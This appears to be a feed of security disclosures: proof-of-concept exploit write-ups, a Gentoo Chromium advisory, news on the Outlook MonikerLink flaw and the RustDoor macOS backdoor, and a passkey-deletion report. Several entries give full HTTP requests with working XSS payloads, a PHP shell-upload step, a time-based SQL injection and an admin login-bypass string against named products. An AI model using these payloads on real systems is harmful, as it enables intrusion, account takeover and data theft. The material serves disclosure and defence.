Savsoft Quiz version 6.0 Enterprise suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting# Date: 2024-01-03# Exploit Author: Eren Sen# Vendor: SAVSOFT QUIZ# Vendor Homepage: https://savsoftquiz.com# Software Link: https://savsoftquiz.com/web/index.php/online-demo/# Version: < 6.0# CVE-ID: N/A# Tested on: Kali Linux / Windows 10# Vulnerabilities Discovered Date : 2024/01/03# Persistent Cross Site Scripting (XSS) Vulnerability# Vulnerable Parameter Type: POST# Vulnerable Parameter: quiz_name# Proof of Concepts:https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13# HTTP Request:POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1Host: demos1.softaculous.comCookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxxContent-Length: 411Cache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Origin: https://demos1.softaculous.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closequiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

Savsoft Quiz 6.0 Enterprise Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Gentoo Linux Security Advisory 202402-23 - Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution. Versions greater than or equal to 121.0.6167.139 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-23  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #922062, #922340, #922903, #923370  
       ID: 202402-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives, the worst of which can lead to remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web. Google  
Chrome is one fast, simple, and secure browser for all your devices.  
Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable        Unaffected  
-------------------------  ----------------  -----------------  
www-client/chromium        < 121.0.6167.139  >= 121.0.6167.139  
www-client/google-chrome   < 121.0.6167.139  >= 121.0.6167.139  
www-client/microsoft-edge  < 121.0.2277.83   >= 121.0.2277.83

Description  
===========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-121.0.6167.139"

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-121.0.6167.139"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-121.0.2277.83"

References  
==========

[ 1 ] CVE-2024-0333  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0333  
[ 2 ] CVE-2024-0517  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0517  
[ 3 ] CVE-2024-0518  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0518  
[ 4 ] CVE-2024-0519  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0519  
[ 5 ] CVE-2024-0804  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0804  
[ 6 ] CVE-2024-0805  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0805  
[ 7 ] CVE-2024-0806  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0806  
[ 8 ] CVE-2024-0807  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0807  
[ 9 ] CVE-2024-0808  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0808  
[ 10 ] CVE-2024-0809  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0809  
[ 11 ] CVE-2024-0810  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0810  
[ 12 ] CVE-2024-0811  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0811  
[ 13 ] CVE-2024-0812  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0812  
[ 14 ] CVE-2024-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0813  
[ 15 ] CVE-2024-0814  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0814  
[ 16 ] CVE-2024-1059  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1059  
[ 17 ] CVE-2024-1060  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1060  
[ 18 ] CVE-2024-1077  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1077

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-23

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-23

Chrome has an issue where the chrome.pageCapture.saveAsMHTML() extension API can be used on blocked origins due to a racy access check.

Chrome chrome.pageCapture.saveAsMHTML() Extension API Blocked Origin Bypass

By Waqas
The #MonikerLink security flaw in Microsoft Outlook allows hackers to execute arbitrary code on the targeted device.
This is a post from HackRead.com Read the original post: New MonikerLink Flaw Exposes Outlook Users to Data Theft and Malware

The #MonikerLink vulnerability (CVE-2024-21413) holds a CVSS score of 9.8 out of 10, indicating critical severity and high exploitability, potentially enabling system compromise with minimal user interaction.

Check Point Research (CPR) has discovered a critical security flaw in Microsoft Outlook. Dubbed the #MonikerLink; the vulnerability allows threat actors to execute arbitrary code on their targeted device. The research, detailed in a blog post, highlights the flaw’s potential to exploit the way Outlook processes certain hyperlinks.

The exploit is tracked as CVE-2024-21413 with a CVSS score of 9.8 out of 10, which means the vulnerability has critical severity and is highly exploitable, possibly allowing an attacker to compromise the system with minimal user interaction. This could lead to complete system compromise, denial of service, and data breach. Furthermore, an attacker could execute arbitrary code, steal data, and install malware. 

The issue occurs due to the way Outlook processes the “file://” hyperlinks, leading to severe security implications. Threat actors can execute unauthorized code on the targeted device. CPR’s research reveals that the #MonikerLink vulnerability misuses the Component Object Model (COM) on Windows, allowing unauthorized code execution and leaking of local NTLM credential information. 

The vulnerability exploits a user’s NTLM credentials to enable arbitrary code execution through the COM in Windows. When a user clicks on the malicious hyperlink, it connects to a remote server controlled by the attacker, compromising authentication details and potentially leading to code execution. This allows attackers to invoke COM objects and execute code on the victim’s machine remotely, bypassing the Protected View mode in Office applications.

Researchers studied three attack vectors for MS Windows-Outlook 2021: the “obvious” Hyperlink attack vector, the “normal” attachment attack vector, and the “advanced” attack vector. The “obvious” Hyperlink attack vector involves sending emails with malicious web hyperlinks, posing security risks in browsers.

The “normal” attachment attack vector involves the attacker sending a malicious email and luring the victim to open the attachment. The Advanced attack vector, the Email Reading attack vector, triggers security problems when the victim reads an email on Outlook.

Microsoft Outlook, one of the world’s most popular Microsoft Office suite apps, has become a critical gateway for introducing cyber threats into organizations. Microsoft’s Threat Protection Intelligence team discovered a critical vulnerability (CVE-2023-23397) in Outlook in March 2023 which threat actor Forest Blizzard was exploiting to steal Net-NTLMv2 hashes and access user accounts.

According to CPR’s blog post, the company has confirmed the latest vulnerability in Microsoft 365 environments and notified the Microsoft Security Response Center. Microsoft is yet to respond to the issue. Hackread.com will update readers as soon as more details are shared with the cybersecurity community.

This vulnerability, which extends beyond Outlook, poses a significant risk to organizational security. Both users and organizations are advised to apply patches, follow security practices, and remain vigilant against suspicious emails.

****RELATED ARTICLES****

1.  **Microsoft Outlook bug expose Windows credentials to hackers**
2.  **StrelaStealer Malware Hijacking Outlook, Thunderbird Accounts**
3.   **Chinese Hackers Stole Signing Key to Breach Outlook Accounts**
4.  **New variant of MassLogger Trojan stealing Chrome, Outlook data**
5.  **Microsoft Teams External Access Abuses to by DarkGate Malware**

New MonikerLink Flaw Exposes Outlook Users to Data Theft and Malware

Adapt CMS version 3.0.3 suffers from persistent cross site scripting and remote shell upload vulnerabilities.

# Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3  
# Date: 02/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.0.3  
# Tested on: Ubuntu 22.04  
# Blog: http://msecureltd.blogspot.com

 *Description*

- It was found that adaptcms v3.0.3 was vulnerable to stored cross  
site scripting

- Also the application allowed the file upload functionality to upload  
PHP files which resulted in remote code execution

*Stored XSS*

*Steps to Reproduce:*

   1. Login as admin and add a new article  
   2. In "Title" add the following payload <svg><animate  
onbegin=alert(1) attributeName=x dur=1s>  
   3. The stored XSS would be triggered upon visiting the article by  
normal user

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&*data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E*&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]

// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
[...]

[...]  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  *<title>*  
*    AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x  
dur=1s>  </title>*  
[...]

*Unrestricted File Upload*

*Steps to Reproduce:*

   1. Login as admin and visit the "Media" page  
   2. Click on "Files" then use the "Add File" functionality  
   3. In "File Contents" add the following PHP code <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

[...]  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[0][File][dir]"*

*uploads/*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][mimetype]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][filesize]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[File][content]"*

*<?php phpinfo(); ?>*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
[...]

// HTTP response

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
*Location: http://192.168.232.133/adaptcms/admin/files  
<http://192.168.232.133/adaptcms/admin/files>*  
[...]

// HTTP GET request

GET /adaptcms/uploads/*test-php.php* HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

[...]  
<h1 class="p">*PHP Version 5.6.40*</h1>  
</td></tr>  
</table>  
<table>  
<tr><td class="e">System </td><td class="v">*Linux ubuntu  
6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12  
18:54:30 UTC 2 x86_64* </td></tr>  
[...]

Adapt CMS 3.0.3 Cross Site Scripting / Shell Upload

The Google Passkey Manager on Android appears to have inconsistent messaging for deletion of data along with other varying issues that lead us to believe it's not ready for prime time.

*INTRODUCTION*  
Passkeys on Android are stored in Google Password Manager by default. The user cannot make their own backups of them.

Note: although the user can export a CSV file with both passkeys and passwords, the lines representing passkeys will not contain any secrets, rendering them useless.

Also note that Google Passkey Manager appears to primarily be a CLOUD-based password manager (with copies of passwords and passkeys usually cached on devices).

*PROBLEM*  
The user may have chosen to configure a "sync passphrase" in Chrome.  
Instructions on what to do, in case the user wishes to change or remove their sync passphrase, can be found in [1] under "Reset your passphrase".

Effectively the user is sent to [2] and should press the button "Clear Data" at the bottom of that page.  
Until mid June 2023, the text near that button used to read (emphasis in CAPS added by me):

   "This will clear your Chrome data from your Google Account.  
   THIS WON'T CLEAR ANY DATA FROM YOUR DEVICES."

However, tapping the "Clear Data" button would unrecoverably DELETE ALL YOUR PASSKEYS (not your passwords).

*ISSUE REPORTED TO GOOGLE*  
I reported this "passkeys gone" problem to Google as a security issue on June 11, 2023.  
Please see the Timeline below for details.

*"FIX"*  
The issue was "fixed" around June 15, 2023, apparently by changing the text at the bottom of [2] into (emphasis in CAPS added by me):

   "This will clear your Chrome data that has been saved in your Google Account.  
   THIS MIGHT CLEAR SOME DATA FROM YOUR DEVICES."

However, tapping the "Clear Data" button will still DELETE ALL OF YOUR PASSKEYS without any other warnings.

In my opinion this is unacceptable, as is the handling of my bug report. Therefore I have not yet reported the issues mentioned below to Google nor to the Chromium team.

*POTENTIAL SYNC ISSUES*  
Apparently Google decided to use a DEVICE based encryption key (instead of a Google ACCOUNT based key) to encrypt the passkey's private keys.  
The idea is that, if you start using an second Android device, the encryption key from the first device is transferred  to your second device.

Note that this requires you to enter your Google cloud password PLUS the screen unlock code of your first device on your second device.

However, transfer of the encryption key will fail if the second device ALREADY HAS an encryption key.

Note: I actually ran into this condition accidentally during tests.  
Although this may not be a typical situation, it is possible to reproduce (which I will not (yet) describe).

Consequently, if you you brick or loose your old Android device, and somehow you managed to already have a DIFFERENT encryption key on your new Android device, passkeys and passwords will sync from the cloud, but the synced passkeys will be UNUSABLE on your new device.

Tip: whatever you do on a new replacement device: don't start by creating a passkey as a test!  
Wait until your old passkeys have synchronized to your new device and you've confirmed that they work, before you add any new passkeys.

*BUG IN PASSWORDS.GOOGLE.COM*  
Editing a passkey's (user) name in [3] renders all passkeys for the domain unusable, with the following error message when attempting to use them:

   "No Passkeys Available  
   There aren't any passkeys for [domain] on this device"

That particular passkey will be unusable forever.  
However, any other passkeys for the same domain become usable again after you delete the -now corrupt and unusable- passkey.

*OTHER ISSUES*  
During my tests I found a lot of other issues (mostly minor compared to those mentioned above).  
Such as the following worrisome messages I repeatedly saw:

   "An unknown error occurred while talking to the credential manager."

   "For security, you can no longer access your encrypted data on this device."

Also, in Chrome settings, after enabling sync, tapping on "Password Manager" would usually open Google Password Manager (implemented as a part of Google Play Services), but sometimes the Chrome built-in password manager instead.

I may reveal other issues at a later stage.

*CONCLUSION*  
In my opinion the reliability of Android's passkey implementation insufficient (immature, not production ready).

There is no way for the user to back up their passkey secrets themselves, while cloud storage of passkeys can obviously not be relied upon (Google owns your passkeys, not you).

The partial integration of Google Password Manager with Chrome's builtin password manager complicates things - in particular when combined with a "sync passphrase" and/or "on device encryption".  
The apparent confusion which party (Google or the Chromium team) is responsible for fixing bugs in Google Password Manager seems amateuristic annd chaotic.

Account lockout is a serious risk. If fallbacks to passwords or recovery codes remains a necessity because of easily lost passkeys, the advantage of "phishing resistance" is mostly moot.

*DISCLOSURE TIMELINE* (format: yyyy-mm-dd)  
2023-06-06 I published a Dutch article "Passkeys voor leken" (Passkeys for beginners) [4].

2023-06-08 After enabling encryption (using a sync passphrase) for all synced data, and then following Google's instructions [1] on how to change that passphrase, I noticed that all passkeys on my Google Pixel 6 Pro Android phone had disappeared.

I wrote about this in [5], but initially thought that I made a mistake myself.  
After thid incident I started to further investigate this issue, which appeared to reproduce.

2023-06-11 I uploaded a vulnerability report to Google titled "Passkeys gone from device after clearing Chrome data from Google Account" [6].

2023-06-12 Google acknowledges receiving my report.

2023-06-14 Google forwards my report to the Chromium team [7] and sets the status of the Google issue to "Won't Fix (Infeasible)".

2023-06-14 Im am notified that my vulnerability report was registered by the Chromium team.  
In [7] I see that the issue was assigned to a specific person (the "assignee" from now on).

2023-06-15 On the bug tracking website [7] I uploaded a zip-file with screenshots to further clarify things.

2023-06-15 The assignee wrote in [7]:

   "This is as expected, but you're right that we should clarify that on the page and that it's unexpected that Android's implementation of Sync differs r.e. the clearing of data from devices."

2023-06-15 The assignee adds a comment:

   "> it's unexpected that Android's implementation of Sync differs r.e. the clearing of data from devices.  
   (Sorry, that was poorly worded. It's potentially _surprising_ that Android differs given the wording.)"

At that time I did not understand what the assignee meant. Later I discovered by accident that the text at the bottom of [2] had been changed, and the assignee was apparently referring to that text.

2023-08-10 After 60 days since my initial report, I addded a comment in [7] that I am able to reproduce the vulnerability using the latest (August) Android update. I added:

   "I don't know whether this is a Chromium or an Android issue, but losing passkeys is unacceptible.  
   What gives?"

2023-09-10 (after 90 days) On [6] I reported that I had not heard back from the Chromium team since June 15 and that I do not understand what they wrote that day, and that there was no response to my August 8 comment.

2023-09-11 My latest comment in [6] is acknowledged by Google and under review.

2023-09-15 Google states that they won't do anything as this vulnerability is tracked by [7].

2024-02-07 No updates on [6] and [7].  
Publication.

*REFERENCES*  
[1] https://support.google.com/chrome/answer/165139

[2] https://chrome.google.com/sync

[3] https://passwords.google.com/

[4] https://security.nl/posting/798699/Passkeys+voor+leken

[5] https://security.nl/posting/798932

[6] https://issuetracker.google.com/issues/286730198

[7] https://bugs.chromium.org/p/chromium/issues/detail?id=1454857

Google Android Passkey Deletion / Confusion

XoopsCore25 version 2.5.11 suffers from a cross site scripting vulnerability.

    ## Title: XoopsCore25-2.5.11-XSS-Reflected## Author: nu11secur1ty## Date: 02/12/2024## Vendor: https://xoops.org/## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:The value of the yname request parameter is copied into the value ofan HTML tag attribute which is encapsulated in single quotation marks.The payload '>333< was submitted in the yname parameter. This inputwas echoed unmodified in the application's response. The attacker cantrick the user to visit very dangerous and malicious URL in thissessionSTATUS: HIGH Vulnerability[+]Exploit execution:```POSTPOST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160Safari/537.36Connection: closeCache-Control: max-age=0Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmnOrigin: https://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563Content-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 148yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)## Time spent:01:17:00

XoopsCore25 2.5.11 Cross Site Scripting

Complaint Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities# Date: 02/09/2-24# Exploit Author: Diyar Saadi# Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7259# Version: V 2.0# Tested on: Windows 11 + XAMPP 8.0.301- SQL Injection## Description ##Multiple SQL injection vulnerabilities have been identified in the Complaint Management System V 2.0. These vulnerabilities allow an attacker to manipulate SQL queries through user-controlled input, potentially leading to unauthorized access or data disclosure , The vulnerable code is in the `complaint-details.php ` file within the `admin` directory. The `cid` parameter .# Proof Of Ceoncept ##--> During forward the payload the response time is expand at least 5 second .--> Payload: 1' AND SLEEP(5) --Request :httpGET /admin/complaint-details.php?cid=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpSec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close# SQL Injection Vulnerability in User Authentications ### Proof Of Concept ##--> Attackers can bypass admin panel by forward the payload .--> Payload : admin'or'1-- from username field and any letter like pwn from password field then click sign in .--> Enjoy :xRequest :POST /admin/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpContent-Length: 46Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://localhost/admin/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: closeusername=admin%27or%271--&password=pwn&submit=Greetz!Sent with [Proton Mail](https://proton.me/) secure email.

Complaint Management System 2.0 SQL Injection

By Waqas
The backdoor impersonates a Visual Studio update.
This is a post from HackRead.com Read the original post: New Rust-Based macOS Backdoor Steals Files, Linked to Ransomware Groups

The Trojan.MAC.RustDoor backdoor is potentially linked to the notorious BlackBasta and (ALPHV/BlackCat) ransomware operators.

Bitdefender researchers have discovered a new backdoor targeting macOS devices. The backdoor, dubbed, Trojan.MAC.RustDoor is written in Rust language and can steal specific files, archive them, and upload them to the C2 (command and control) server.

According to the researchers, the backdoor has been active since November 2023. While Bitdefender could not attribute the campaign to a known threat actor, artefacts and indicators of compromise (IoCs) suggest a possible relationship with BlackBasta and ALPHV/BlackCat ransomware operators.

The backdoor impersonates a Visual Studio update, distributed as FAT binaries with Mach-O files for Intel x86\_64 and ARM architectures. Samples identified by Bitdefender were titled:

*   zshrc2
*   Previewers
*   VisualStudioUpdater
*   VisualStudioUpdating
*   visualstudioupdate
*   VisualStudioUpdater\_Patch
*   DO\_NOT\_RUN\_ChromeUpdates

The first samples were found in November 2023 and the newest on 2nd February 2024. The Rust-based source code makes it harder for security researchers to analyze and detect its malicious code, potentially giving malware authors an advantage.

The backdoor has multiple variants, named Variant 1, Variant 2, and Variant Zero, with most samples sharing core functionalities. Variant 1 is a testing version, first seen on 22nd November 2023, and contains an embedded plist file. It is meant to ensure persistence using LaunchAgents but does not include a field for this method.

